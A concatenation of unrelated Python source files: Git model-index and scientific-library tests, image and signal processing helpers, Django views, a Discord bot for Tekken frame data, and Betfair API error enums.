git_index.add_model("docfreq", "92609e70-f79c-46b5-8419-55726e873cfc", meta, template)
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
meta["model"]["license"] = "ODbL-1.0"
git_index.add_model("docfreq", "92609e70-f79c-46b5-8419-55726e873cfc", meta, template)
self.assertEqual(git_index.models["docfreq"]["92609e70-f79c-46b5-8419-55726e873cfc"],
meta["model"])
self.assertNotEqual(git_index.meta["docfreq"]["default"],
"92609e70-f79c-46b5-8419-55726e873cfc")
model_path = os.path.join(
self.repo_path, "docfreq", "92609e70-f79c-46b5-8419-55726e873cfc.md")
self.assertTrue(os.path.exists(model_path))
with open(model_path) as _in:
model = _in.read()
with open(os.path.join(os.path.dirname(__file__), "model.md")) as _in:
real_model = _in.read()
self.assertEqual(model, real_model)
git_index.add_model("docfreq", "92609e70-f79c-46b5-8419-55726e873cfc", meta, template,
update_default=True)
self.assertDictEqual(git_index.meta["docfreq"], meta["default"])
git_index.add_model("other", "92609e70-f79c-46b5-8419-55726e873cfc", meta, template)
self.assertEqual(git_index.models["other"]["92609e70-f79c-46b5-8419-55726e873cfc"],
meta["model"])
self.assertDictEqual(git_index.meta["other"], meta["default"])
self.assertTrue(os.path.exists(os.path.join(
self.repo_path, "other", "92609e70-f79c-46b5-8419-55726e873cfc.md")))
self.assertDictEqual(git_index.meta["other"], meta["default"])
def test_readme(self):
self.maxDiff = None
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
template_path = os.path.join(self.templates_dir, "readme.md.jinja2")
template = git_index.load_template(template_path)
git_index.update_readme(template)
readme_path = os.path.join(self.cached_path, "src-d/models/README.md")
self.assertTrue(os.path.exists(readme_path))
with open(readme_path) as _in:
readme = _in.read()
with open(os.path.join(os.path.dirname(__file__), "readme.md")) as _in:
real_readme = _in.read()
self.assertEqual(readme, real_readme)
def test_initialize(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
with open(os.path.join(git_index.cached_repo, ".gitignore"), "w") as _out:
_out.write("nothing")
git_index.reset()
empty_index = {"models": {}, "meta": {}}
self.assertDictEqual(empty_index, git_index.contents)
self.assertTrue(os.path.exists(git_index.cached_repo))
self.assertListEqual(sorted(os.listdir(git_index.cached_repo)), [".gitignore", "docfreq"])
def test_upload_add(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
git_index.upload("add", {"model": "a", "uuid": "b"})
self.assertTrue(fake_git.FakeRepo.added)
self.assertIn("Add a/b\n\nSigned-off-by:", fake_git.FakeRepo.message)
self.assertTrue(fake_git.FakeRepo.pushed)
def test_upload_delete(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
git_index.upload("delete", {"model": "a", "uuid": "b"})
self.assertTrue(fake_git.FakeRepo.added)
self.assertIn("Delete a/b\n\nSigned-off-by:", fake_git.FakeRepo.message)
self.assertTrue(fake_git.FakeRepo.pushed)
def test_upload_init(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
git_index.upload("reset", {})
self.assertTrue(fake_git.FakeRepo.added)
self.assertIn("Initialize a new Modelforge index\n\nSigned-off-by:",
fake_git.FakeRepo.message)
self.assertTrue(fake_git.FakeRepo.pushed)
def test_upload_bug(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
fake_git.FakeRepo.reset(self.default_index, head="1")
with self.assertRaises(ValueError):
git_index.upload("reset", {})
def test_template(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
with self.assertRaises(ValueError):
git_index.load_template("fake.jinj4")
with self.assertRaises(ValueError):
git_index.load_template("fake.jinja2")
template_path = os.path.join(self.templates_dir, "readme.md.jinja2")
template = git_index.load_template(template_path)
self.assertEqual(template.render(meta={}, models={}, links={}),
"source{d} MLonCode models\n=========================\n")
if __name__ == "__main__":
unittest.main()
|
500514
|
from magma import *
from magma.testing import check_files_equal
def test():
class main(Circuit):
name = "main"
io = IO(O=Out(Bits[2]))
wire(array([0,1]), io.O)
compile("build/out2", main, output="verilog")
assert check_files_equal(__file__, "build/out2.v", "gold/out2.v")
|
500551
|
import os
from pprint import pprint
from environs import Env, EnvValidationError
from marshmallow.validate import OneOf, Email, Length, Range
os.environ["TTL"] = "-2"
os.environ["NODE_ENV"] = "invalid"
os.environ["EMAIL"] = "^_^"
env = Env(eager=False)
TTL = env.int("TTL", validate=Range(min=0, max=100))
NODE_ENV = env.str(
"NODE_ENV", validate=OneOf(["production", "development"], error="NODE_ENV must be one of: {choices}")
)
EMAIL = env.str("EMAIL", validate=[Length(min=4), Email()])
# This will raise an error with the combined validation messages
try:
env.seal()
except EnvValidationError as error:
pprint(error.error_messages)
|
500556
|
import numpy as np
import torch
import albumentations as A
__all__ = ["SigmoidNormalization", "channel_name_to_mean_std", "CubicRootNormalization"]
channel_name_to_mean_std = {
"vv": (0, 50),
"vh": (0, 50),
"bathymetry": (
0,
1000.0,
),
"wind_speed": (6.81594445, 1.62833557),
}
# VH_dB (array([-26.29277562]), array([4.96274162]))
# VV_dB (array([-16.42577586]), array([4.79392252]))
# bathymetry (array([-1027.55193048]), array([1223.22965922]))
# owiMask (array([0.21731419]), array([0.53000913]))
# owiWindDirection (array([194.57592277]), array([52.55040799]))
# owiWindQuality (array([1.56499957]), array([0.64571367]))
# owiWindSpeed (array([6.81594445]), array([1.62833557]))
class CubicRootNormalization(A.ImageOnlyTransform):
def __init__(self):
super().__init__(always_apply=True)
def apply(self, img, **params) -> np.ndarray:
return np.cbrt(img)
def get_transform_init_args(self):
return tuple()
class SigmoidNormalization(A.ImageOnlyTransform):
def __init__(self, midpoint=-20, temperature=0.18):
super().__init__(always_apply=True)
self.midpoint = midpoint
self.temperature = temperature
def apply(self, img, **params):
x = torch.from_numpy(img)
xs = (x - self.midpoint) * self.temperature
return xs.sigmoid().numpy()
def get_transform_init_args_names(self):
return ("midpoint", "temperature")
|
500593
|
import numpy as np
def get_kaiserWindow(kHW):
kaiserWindow = np.zeros(kHW * kHW)
if kHW == 8:
kaiserWindow[0 + kHW * 0] = 0.1924
kaiserWindow[0 + kHW * 1] = 0.2989
kaiserWindow[0 + kHW * 2] = 0.3846
kaiserWindow[0 + kHW * 3] = 0.4325
kaiserWindow[1 + kHW * 0] = 0.2989
kaiserWindow[1 + kHW * 1] = 0.4642
kaiserWindow[1 + kHW * 2] = 0.5974
kaiserWindow[1 + kHW * 3] = 0.6717
kaiserWindow[2 + kHW * 0] = 0.3846
kaiserWindow[2 + kHW * 1] = 0.5974
kaiserWindow[2 + kHW * 2] = 0.7688
kaiserWindow[2 + kHW * 3] = 0.8644
kaiserWindow[3 + kHW * 0] = 0.4325
kaiserWindow[3 + kHW * 1] = 0.6717
kaiserWindow[3 + kHW * 2] = 0.8644
kaiserWindow[3 + kHW * 3] = 0.9718
for i in range(kHW // 2):
for j in range(kHW // 2, kHW):
kaiserWindow[i + kHW * j] = kaiserWindow[i + kHW * (kHW - j - 1)]
for i in range(kHW // 2, kHW):
for j in range(kHW):
kaiserWindow[i + kHW * j] = kaiserWindow[kHW - i - 1 + kHW * j]
elif kHW == 12:
kaiserWindow[0 + kHW * 0] = 0.1924
kaiserWindow[0 + kHW * 1] = 0.2615
kaiserWindow[0 + kHW * 2] = 0.3251
kaiserWindow[0 + kHW * 3] = 0.3782
kaiserWindow[0 + kHW * 4] = 0.4163
kaiserWindow[0 + kHW * 5] = 0.4362
kaiserWindow[1 + kHW * 0] = 0.2615
kaiserWindow[1 + kHW * 1] = 0.3554
kaiserWindow[1 + kHW * 2] = 0.4419
kaiserWindow[1 + kHW * 3] = 0.5139
kaiserWindow[1 + kHW * 4] = 0.5657
kaiserWindow[1 + kHW * 5] = 0.5927
kaiserWindow[2 + kHW * 0] = 0.3251
kaiserWindow[2 + kHW * 1] = 0.4419
kaiserWindow[2 + kHW * 2] = 0.5494
kaiserWindow[2 + kHW * 3] = 0.6390
kaiserWindow[2 + kHW * 4] = 0.7033
kaiserWindow[2 + kHW * 5] = 0.7369
kaiserWindow[3 + kHW * 0] = 0.3782
kaiserWindow[3 + kHW * 1] = 0.5139
kaiserWindow[3 + kHW * 2] = 0.6390
kaiserWindow[3 + kHW * 3] = 0.7433
kaiserWindow[3 + kHW * 4] = 0.8181
kaiserWindow[3 + kHW * 5] = 0.8572
kaiserWindow[4 + kHW * 0] = 0.4163
kaiserWindow[4 + kHW * 1] = 0.5657
kaiserWindow[4 + kHW * 2] = 0.7033
kaiserWindow[4 + kHW * 3] = 0.8181
kaiserWindow[4 + kHW * 4] = 0.9005
kaiserWindow[4 + kHW * 5] = 0.9435
kaiserWindow[5 + kHW * 0] = 0.4362
kaiserWindow[5 + kHW * 1] = 0.5927
kaiserWindow[5 + kHW * 2] = 0.7369
kaiserWindow[5 + kHW * 3] = 0.8572
kaiserWindow[5 + kHW * 4] = 0.9435
kaiserWindow[5 + kHW * 5] = 0.9885
for i in range(kHW // 2):
for j in range(kHW // 2, kHW):
kaiserWindow[i + kHW * j] = kaiserWindow[i + kHW * (kHW - j - 1)]
for i in range(kHW // 2, kHW):
for j in range(kHW):
kaiserWindow[i + kHW * j] = kaiserWindow[kHW - i - 1 + kHW * j]
else:
for k in range(kHW * kHW):
kaiserWindow[k] = 1.0
kaiserWindow = kaiserWindow.reshape((kHW, kHW))
return kaiserWindow
def get_kaiserWindow_np(kHW):
k = np.kaiser(kHW, 2)
k_2d = k[:, np.newaxis] @ k[np.newaxis, :]
return k_2d
if __name__ == '__main__':
import numpy as np
kaiser = get_kaiserWindow(8)
kaiser_np = get_kaiserWindow_np(8)
diff = np.abs(kaiser-kaiser_np)
print(np.max(diff))
print(np.sum(diff))
|
500611
|
for nname, net in ctx.nets:
ctx.lockNetRouting(nname)
ctx.cells["slice_i"].addInput("A0")
ctx.connectPort("ctr[26]", "slice_i", "A0")
ctx.cells["slice_i"].setParam("LUT0_INITVAL", "0101010101010101") # LED is active low so invert
ctx.cells["slice_i"].setParam("A0MUX", "A0") # remove constant mux on LUT input
|
500623
|
import json
from editor.views.generic import user_json, stamp_json, comment_json
from editor.models import TimelineItem
from django.views import generic
from django import http
from django.urls import reverse
event_json_views = {
'stamp': stamp_json,
'comment': comment_json,
}
def event_json(event, viewed_by):
date = event.date.strftime('%Y-%m-%d %H:%M:%S')
user = user_json(event.user)
if event.type not in event_json_views:
raise Exception("Unrecognised event type %s" % event.type)
data = event_json_views[event.type](event.data, viewed_by=viewed_by)
return {
'date': date,
'type': event.type,
'data': data,
'user': user,
}
def timeline_json(events, viewed_by):
return [event_json(event, viewed_by) for event in events]
class DeleteTimelineItemView(generic.DeleteView):
model = TimelineItem
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
if self.object.can_be_deleted_by(self.request.user):
self.object.delete()
return http.HttpResponse('timeline item {} deleted'.format(self.object.pk))
else:
return http.HttpResponseForbidden('You don\'t have the necessary access rights.')
class HideTimelineItemView(generic.UpdateView):
model = TimelineItem
def post(self, request, *args, **kwargs):
self.object = self.get_object()
self.object.hidden_by.add(self.request.user)
data = {
'success': True,
'undo': reverse('timelineitem_unhide', args=(self.object.pk,))
}
return http.HttpResponse(json.dumps(data), content_type='application/json')
class UnhideTimelineItemView(generic.UpdateView):
model = TimelineItem
def post(self, request, *args, **kwargs):
self.object = self.get_object()
self.object.hidden_by.remove(self.request.user)
data = {
'success': True,
}
return http.HttpResponse(json.dumps(data), content_type='application/json')
|
500625
|
import maya.mel as mm
def evalMelString(pyString):
return mm.eval(pyString)
def convertStringsToMelArray(pyStrings):
return str([str(x) for x in pyStrings]).replace("'","\"").replace("[","{").replace("]", "}")
|
500653
|
from __future__ import print_function, absolute_import, division, unicode_literals
import numpy as np
import pytest
import pdb
from astropy import units as u
from astropy import constants as const
from linetools.spectralline import AbsLine
from linetools.analysis import voigt as lav
c_kms = const.c.to('km/s').value
def test_voigt_model():
from astropy.modeling import fitting
# Wavelength array
wave = np.linspace(3644, 3650, 100)*u.AA
# HI line
abslin = AbsLine(1215.670*u.AA, z=2.)
abslin.attrib['N'] = 10**14./u.cm**2
abslin.attrib['b'] = 25.*u.km/u.s
# Voigt
vmodel = abslin.generate_voigt(wave=wave)
vmodel.sig = 0.1
# Voigt fit
abslin.analy['spec'] = vmodel
abslin.limits.set([-100.,100]*u.km/u.s)
abslin.measure_aodm(normalize=False) # Sets analysis pixels
fitvoigt = lav.single_voigt_model(logN=np.log10(abslin.attrib['N'].value),
b=abslin.attrib['b'].value, z=2., wrest=abslin.wrest.value,
gamma=abslin.data['gamma'].value,
f=abslin.data['f'], fwhm=3.)
# Restrict parameter space
fitvoigt.logN.min = 12.
fitvoigt.b.min = 10.
fitvoigt.z.min = 2. + -100. * (1 + 2.) / c_kms
fitvoigt.z.max = 2. + 100 * (1 + 2.) / c_kms
# Fit
fitter = fitting.LevMarLSQFitter()
parm = fitter(fitvoigt,vmodel.wavelength[abslin.analy['pix']].value,
vmodel.flux[abslin.analy['pix']].value)
assert np.abs(parm.logN.value-np.log10(abslin.attrib['N'].value)) < 0.1
def test_voigt_sngl_line():
# Wavelength array
wave = np.linspace(3644, 3650, 100)*u.AA
imn = np.argmin(np.abs(wave.value-3647))
# HI line
abslin = AbsLine(1215.670*u.AA, z=2.)
abslin.attrib['N'] = 10**14./u.cm**2
abslin.attrib['b'] = 25.*u.km/u.s
# Voigt
vmodel = abslin.generate_voigt(wave=wave)
np.testing.assert_allclose(vmodel.flux[imn].value,0.05145500775919881)
def test_voigt_multi_line():
# Wavelength array
wave = np.linspace(3644, 3650, 100)*u.AA
imn = np.argmin(np.abs(wave.value-3646.2))
# HI line
abslin = AbsLine(1215.670*u.AA, z=2.)
abslin.attrib['N'] = 10**17.5/u.cm**2
abslin.attrib['b'] = 20.*u.km/u.s
# DI line
abslin2 = AbsLine('DI 1215', z=2.)
abslin2.attrib['N'] = 10**13./u.cm**2
abslin2.attrib['b'] = 15.*u.km/u.s
# Voigt
vmodel3 = lav.voigt_from_abslines(wave,[abslin,abslin2])
np.testing.assert_allclose(vmodel3.flux[imn].value,0.5715512949324375)
def test_voigt_fail():
#
wave = np.linspace(3644, 3650, 100)
pytest.raises(ValueError, lav.voigt_from_abslines, wave, [None, None])
#
wave = np.linspace(3644, 3650, 100)*u.AA
pytest.raises(IOError, lav.voigt_from_abslines, wave, [None, None],
skip_wveval=True)
def test_voigt_sngl_tau():
# Wavelength array
wave = np.linspace(3644, 3650, 100)*u.AA
imn = np.argmin(np.abs(wave.value-3647))
# HI line
abslin = AbsLine(1215.670*u.AA, z=2.)
abslin.attrib['N'] = 10**14./u.cm**2
abslin.attrib['b'] = 25.*u.km/u.s
# Tau
tau = lav.voigt_from_abslines(wave,abslin,ret='tau')
assert not np.any(tau<0)
np.testing.assert_allclose(tau[imn], 2.9681283001576779)
def test_voigt_king():
vin = np.linspace(0., 1., num=1000)
a = 0.1
voigt = lav.voigtking(vin, a)
# Test
np.testing.assert_allclose(voigt[50], 0.89440482758173867)
def test_voigt_from_components():
from linetools.isgm.tests.test_use_abscomp import mk_comp
wv_array = np.arange(900, 1250, 0.01) * u.AA
comp1, HIlines = mk_comp('HI', zcomp=0.01, vlim=[-10,10]*u.km/u.s)
comp2, HIlines = mk_comp('HI', zcomp=0.05, vlim=[-10,10]*u.km/u.s)
model = lav.voigt_from_components(wv_array, [comp1,comp2])
|
500671
|
import FWCore.ParameterSet.Config as cms
from Configuration.EventContent.EventContent_cff import *
# in case we want only the tagInfos and nothing more:
# (this means we need the jets for pt, eta and the JTA for being able
# to find the jet ref from the tag info)
BTAGCALAbtagCalibEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *',
'keep *_mcAlgoJetFlavour_*_*',
'keep *_mcPhysJetFlavour_*_*',
'keep *_iterativeCone5CaloJets_*_*',
'keep *_jetTracksAssociator_*_*',
'keep *_impactParameterTagInfos_*_*',
'keep *_combinedSVTagInfos_*_*')
)
# in case we want to be able to compute the TagInfos ourselves
# (basically we need tracks and primary vertices for that)
BTAGCALBbtagCalibEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *',
'keep *_mcAlgoJetFlavour_*_*',
'keep *_mcPhysJetFlavour_*_*',
'keep *_iterativeCone5CaloJets_*_*',
'keep *_ctfWithMaterialTracks_*_*',
'keep *_offlinePrimaryVerticesFromCTFTracks_*_*')
)
btagCalibEventSelection = cms.PSet(
SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('btagCalibPath')
)
)
|
500681
|
import numpy as np
from skorecard.bucketers import AsIsCategoricalBucketer
def test_correct_output(df):
"""Test that correct use of CatBucketTransformer returns expected results."""
X = df
y = df["default"].values
asb = AsIsCategoricalBucketer(variables=["EDUCATION"])
asb.fit(X, y)
X_trans = asb.transform(X)
assert len(X["EDUCATION"].unique()) == len(X_trans["EDUCATION"].unique())
def test_specials(df):
"""Test specials get assigned to the right bin."""
X = df[["EDUCATION"]]
y = df["default"]
asb = AsIsCategoricalBucketer(variables=["EDUCATION"], specials={"EDUCATION": {"ed 0": [1]}})
asb.fit(X, y)
X_transform = asb.transform(X)
# Make sure value 1 is assigned special bucket
assert np.unique(X_transform[X["EDUCATION"] == 1].values)[0] == -3
def test_missing_default(df_with_missings) -> None:
"""Test that missing values are assigned to the right bucket."""
X = df_with_missings
y = df_with_missings["default"].values
bucketer = AsIsCategoricalBucketer(variables=["EDUCATION"])
X["EDUCATION_trans"] = bucketer.fit_transform(X[["EDUCATION"]], y)
assert len(X["EDUCATION_trans"].unique()) == 8 # 7 unique values + 1 for NAs
|
500687
|
import pytest
import pylint_protobuf
@pytest.fixture
def motorcycle_mod(proto_builder):
preamble = """
syntax = "proto3";
package bikes;
"""
return proto_builder("""
message Engine {
int32 displacement = 2;
}
message Motorcycle {
string brand = 1;
string name = 2;
Engine engine = 3;
}
""", 'motorcycles_pb2', preamble=preamble)
@pytest.fixture
def issue26_mod(motorcycle_mod, module_builder):
return module_builder("""
from {} import Motorcycle
def get_motorcycle() -> Motorcycle:
return Motorcycle()
def something():
m = get_motorcycle()
engine = m.engine
should_warn = m.should_warn
""".format(motorcycle_mod), 'issue26_mod')
EXPECTED_MSGS = [
pylint_protobuf.MESSAGES['E5901'][0] % ('should_warn', 'Motorcycle'),
# "Instance of 'Motorcycle' has no 'should_warn' member", # no E1101
]
def test_no_E1101_on_returned_values(issue26_mod, linter_factory):
linter = linter_factory(
register=pylint_protobuf.register,
disable=['all'], enable=['protobuf-undefined-attribute', 'no-member'],
)
linter.check([issue26_mod])
actual_msgs = [message.msg for message in linter.reporter.messages]
assert sorted(EXPECTED_MSGS) == sorted(actual_msgs)
|
500699
|
import discord
import asyncio
import logging
from discord.ext import commands
# self-created modules below
import lib.embedCreation as embedCreation #contains functions for creating an embed
import lib.tekkenFinder as tekkenFinder #contains functions for finding character and move details
# Get token from local dir text file
tokenFile = open("token.txt", 'r')
token = tokenFile.read()
tokenFile.close()
description = 'A Tekken 7 Frame Data Bot made by Hann.'
prefix = '.'
discord_logger = logging.getLogger('discord')
discord_logger.setLevel(logging.CRITICAL)
log = logging.getLogger()
log.setLevel(logging.INFO)
handler = logging.FileHandler(filename='combot.log', encoding='utf-8', mode='w')
log.addHandler(handler)
bot = commands.Bot(command_prefix=prefix, description=description)
combot_gagged_channels_File = open("lib/gagged_channels.txt", 'r')
combot_gagged_channels = combot_gagged_channels_File.read().splitlines()
combot_gagged_channels_File.close()
# TODO: YOU LEFT OFF HERE
# TODO: MAYBE NEXT TIME FAM
# file = open('bot_settings.json', 'r+')
# content = file.read()
# file.close()
# stuff = content.loads(content)
@bot.event
async def on_ready():
# Display Login Status in Console
print('<---------------------------->')
print('Logged in as')
print(bot.user.name)
print(bot.user.id)
print('<---------------------------->')
while True:
await bot.change_presence(game=discord.Game(name='DAH'))
await asyncio.sleep(30)
await bot.change_presence(game=discord.Game(name='.help'))
await asyncio.sleep(120)
await bot.change_presence(game=discord.Game(name='<NAME>'))
await asyncio.sleep(30)
await bot.change_presence(game=discord.Game(name='TEKKEN 7'))
await asyncio.sleep(30)
@bot.event
async def on_message(message):
# check if message author is a bot
if message.author.bot:
# check if sent by self
if message.author.id == bot.user.id:
await bot_message_cleanup(message)
return
if await is_Gagged(message):
return
if message.content.startswith('!'):
if message.content.startswith('!!'):
case_sensitive_toggle = True
else:
case_sensitive_toggle = False
# message content should look like this
# ![character] [move]
userMessage = message.content
userMessage = userMessage.replace("!", "")
user_message_list = userMessage.split(" ", 1)
if len(user_message_list) <= 1:
print('! command used, but character not found/move not given\n')
return
user_Chara_Name = user_message_list[0]
user_Chara_Move = user_message_list[1]
#TODO: IMPLEMENT CHARACTER SHORTHAND NAME CONVERTER, OR CHARACTER NAMELIST DISPLAY
character_name_string = tekkenFinder.does_char_exist(user_Chara_Name)
if character_name_string:
user_Chara_Name = character_name_string.lower()
move_attribute_dict = tekkenFinder.get_Move_Details(user_Chara_Name,
user_Chara_Move,
case_sensitive_toggle)
if move_attribute_dict: # if dictionary not empty, move found
embed_MoveFound = await get_MoveFound_Embed(**move_attribute_dict)
await bot.send_message(message.channel, embed=embed_MoveFound)
else: # dictionary is empty, move not found
embed_SimilarMoves = await get_SimilarMoves_Embed(user_Chara_Name,user_Chara_Move)
await bot.send_message(message.channel, embed=embed_SimilarMoves)
await user_message_cleanup(message)
return
else:
await bot.send_message(message.channel, 'Character not found: ' + '**' + user_Chara_Name + '**')
return
await bot.process_commands(message)
@bot.command(pass_context=True)
async def legend(ctx):
"""Displays commonly used abbreviations, notations and their corresponding input icons."""
embed_legend = embedCreation.embed_legend()
await bot.say(embed=embed_legend)
await user_message_cleanup(ctx.message)
@bot.command(pass_context=True)
@commands.has_permissions(administrator=True)
async def gagcombot(ctx):
"""Gags Combot in this channel. Usable only by admin roles."""
channel = ctx.message.channel.id
combot_gagged_channels.append(channel)
f = open("lib/gagged_channels.txt","a")
f.write(channel + '\n')
f.close()
await bot.say('Mmmph! Gagging Combot.')
@bot.command(pass_context=True)
@commands.has_permissions(administrator=True)
async def ungagcombot(ctx):
"""Ungags Combot in this channel. Usable only by server admins."""
channel = ctx.message.channel.id
if channel in combot_gagged_channels:
combot_gagged_channels.remove(channel)
else:
return
# clear file contents and rewrite
open("lib/gagged_channels.txt", "w").close()
f = open("lib/gagged_channels.txt", "a")
for channel in combot_gagged_channels:
f.write(channel+'\n')
f.close()
await bot.say('Ungagged Combot. Beep Boop.')
@bot.command(pass_context=True)
async def printServers(ctx):
"""List servers with Combot. Cmd restricted to Bot Owner."""
appinfo = await bot.application_info()
owner = appinfo.owner.id
if ctx.message.author.id != owner:
print('Non-bot owner called print server.')
await bot.say('Command restricted to bot owner only.')
await user_message_cleanup(ctx.message)
return
else:
print('Bot Owner called print server.')
serverConctStr = ''
for server in bot.servers:
serverConctStr = serverConctStr + server.name + '\n'
await bot.say('Server List: \n' + serverConctStr)
await user_message_cleanup(ctx.message)
@bot.command(pass_context=True)
async def Frame_Data(ctx):
"""Use ![character] [move], !! for case-sensitive search"""
await user_message_cleanup(ctx.message)
return
@bot.command(pass_context=True)
async def invite(ctx):
"""Invite the bot to your server."""
await bot.say('Use this link to add me to your server. \nhttps://discordapp.com/oauth2/authorize?client_id=302295833208946689&scope=bot&permissions=11264')
await user_message_cleanup(ctx.message)
return
# This block of code to be used when character html pages are updated, do not edit
@bot.command(pass_context=True)
async def convertAll(ctx):
"""Converts all """
appinfo = await bot.application_info()
owner = appinfo.owner.id
if ctx.message.author.id != owner:
return
else:
await bot.say('Converting all character htmls to json.')
tekkenFinder.charJsonMassConverter()
return
@bot.event
async def on_command_error(error, ctx):
if isinstance(error, commands.CheckFailure):
await bot.send_message(ctx.message.channel, "You don't have permissions to run this.")
# ==============================================
# ==========NON COMMAND FUNCTIONS===============
# ==============================================
async def bot_message_cleanup(message):
TZ_Server_ID = '165310633884123137'
TZ_FrameChannel_ID = '315052762947649536'
TestServer_Server_ID = '302481884984639488'
TestServer_ChannelID = '303175029884059649'
Delay_Seconds = 10
if message.channel.is_private or message.channel.id == TZ_FrameChannel_ID:
# lazy workaround for TZ's frame data channel cuz ppl spam shit in chara channels
# dont do shit
return
if message.server.id == TZ_Server_ID:
# lazy workaround No.2
await asyncio.sleep(Delay_Seconds)
await bot.delete_message(message)
return
if message.channel.permissions_for(message.server.me).manage_messages:
# self delete does not require server permissions,
# but tying both cleanups to one check for now until I make a controllable toggle.
await asyncio.sleep(Delay_Seconds)
await bot.delete_message(message)
return
async def user_message_cleanup(message):
Delay_Seconds = 15
if message.channel.is_private:
return
if message.channel.permissions_for(message.server.me).manage_messages:
await asyncio.sleep(Delay_Seconds)
await bot.delete_message(message)
async def is_Gagged(user_message):
message = user_message
# check if channel is gagged
if message.content != '.ungagcombot':
for channelID in combot_gagged_channels:
if message.channel.id == channelID:
return True
return False
async def get_MoveFound_Embed(**move_attribute_dict):
misc_details_Dict = tekkenFinder.get_Misc_Chara_Details(move_attribute_dict['char_name'])
embedDict = {**move_attribute_dict, **misc_details_Dict}
embed_MoveFound = embedCreation.embed_Move_Details(**embedDict)
return embed_MoveFound
async def get_SimilarMoves_Embed(user_Chara_Name, user_Chara_Move):
misc_details_Dict = tekkenFinder.get_Misc_Chara_Details(user_Chara_Name)
similar_moves_list = tekkenFinder.get_Similar_Moves(user_Chara_Name, user_Chara_Move)
embed_SimilarMoves = embedCreation.embed_Similar_Moves(similar_moves_list, user_Chara_Name, **misc_details_Dict)
return embed_SimilarMoves
#Starts the bot
bot.run(token)
handlers = log.handlers[:]
for hdlr in handlers:
hdlr.close()
log.removeHandler(hdlr)
|
500701
|
from enum import Enum
GENERIC_JSON_RPC_EXCEPTIONS = {
-32700: "Invalid JSON was received by the server. An error occurred on the server while parsing the JSON text.",
-32601: "Method not found",
-32602: "Problem parsing the parameters, or a mandatory parameter was not found",
-32603: "Internal JSON-RPC error",
}
class RaceStatusEnum(Enum):
DORMANT = "There is no data available for this race."
DELAYED = "The start of the race has been delayed"
PARADING = "The horses are in the parade ring"
GOINGDOWN = "The horses are going down to the starting post"
GOINGBEHIND = "The horses are going behind the stalls"
ATTHEPOST = "The horses are at the post"
UNDERORDERS = "The horses are loaded into the stalls/race is about to start"
OFF = "The race has started"
FINISHED = "The race has finished"
FALSESTART = "There has been a false start"
PHOTOGRAPH = "The result of the race is subject to a photo finish"
RESULT = "The result of the race has been announced"
WEIGHEDIN = "The jockeys have weighed in"
RACEVOID = "The race has been declared void"
ABANDONED = "The meeting has been cancelled"
class LoginExceptions(Enum):
INVALID_USERNAME_OR_PASSWORD = "The username or password are invalid"
ACCOUNT_NOW_LOCKED = "The account was just locked"
ACCOUNT_ALREADY_LOCKED = "The account is already locked"
PENDING_AUTH = "Pending authentication"
TELBET_TERMS_CONDITIONS_NA = "Telbet terms and conditions rejected"
DUPLICATE_CARDS = "Duplicate cards"
SECURITY_QUESTION_WRONG_3X = (
"The user has entered wrong the security answer 3 times"
)
KYC_SUSPEND = "KYC suspended"
SUSPENDED = "The account is suspended"
CLOSED = "The account is closed"
SELF_EXCLUDED = "The account has been self-excluded"
INVALID_CONNECTIVITY_TO_REGULATOR_DK = (
"The DK regulator cannot be accessed due to some internal problems in the "
"system behind or in at regulator; timeout cases included."
)
NOT_AUTHORIZED_BY_REGULATOR_DK = (
"The user identified by the given credentials is not authorized in the DKs "
"jurisdictions due to the regulators policies. Ex = the user for which "
"this session should be created is not allowed to act(play bet) in the DKs "
"jurisdiction."
)
INVALID_CONNECTIVITY_TO_REGULATOR_IT = (
"The IT regulator cannot be accessed due to some internal problems in the "
"system behind or in at regulator; timeout cases included."
)
NOT_AUTHORIZED_BY_REGULATOR_IT = (
"The user identified by the given credentials is not authorized in the ITs "
"jurisdictions due to the regulators policies. Ex = the user for which this "
"session should be created is not allowed to act(play bet) in the ITs "
"jurisdiction."
)
SECURITY_RESTRICTED_LOCATION = "The account is restricted due to security concerns"
BETTING_RESTRICTED_LOCATION = (
"The account is accessed from a location where betting is restricted"
)
TRADING_MASTER = "Trading Master Account"
TRADING_MASTER_SUSPENDED = "Suspended Trading Master Account"
AGENT_CLIENT_MASTER = "Agent Client Master"
AGENT_CLIENT_MASTER_SUSPENDED = "Suspended Agent Client Master"
DANISH_AUTHORIZATION_REQUIRED = "Danish authorization required"
SPAIN_MIGRATION_REQUIRED = "Spain migration required"
DENMARK_MIGRATION_REQUIRED = "Denmark migration required"
SPANISH_TERMS_ACCEPTANCE_REQUIRED = (
"The latest Spanish terms and conditions version must be accepted"
)
ITALIAN_CONTRACT_ACCEPTANCE_REQUIRED = (
"The latest Italian contract version must be accepted"
)
CERT_AUTH_REQUIRED = (
"Certificate required or certificate present but could not authenticate with it"
)
CHANGE_PASSWORD_REQUIRED = "<PASSWORD>"
PERSONAL_MESSAGE_REQUIRED = "Personal message required for the user"
INTERNATIONAL_TERMS_ACCEPTANCE_REQUIRE = (
"The latest international terms and conditions must be accepted prior "
"to logging in."
)
EMAIL_LOGIN_NOT_ALLOWED = "This account has not opted in to log in with the email"
MULTIPLE_USERS_WITH_SAME_CREDENTIAL = (
"There is more than one account with the same credential"
)
ACCOUNT_PENDING_PASSWORD_CHANGE = (
"The account must undergo password recovery to reactivate"
)
TEMPORARY_BAN_TOO_MANY_REQUEST = (
"The limit for successful login requests per minute has been exceeded. New "
"login attempts will be banned for 20 minutes"
)
class ApingException(Enum):
TOO_MUCH_DATA = "The operation requested too much data exceeding the Market Data Request Limits."
INVALID_INPUT_DATA = (
"The data input is invalid. A specific description is returned via errorDetails as shown "
"below."
)
INVALID_SESSION_INFORMATION = (
"The session token hasnt been provided is invalid or has expired."
)
NO_APP_KEY = (
"An application key header (X-Application) has not been provided in the request"
)
NO_SESSION = (
"A session token header (X-Authentication) has not been provided in the request"
)
UNEXPECTED_ERROR = "An unexpected internal error occurred that prevented successful request processing."
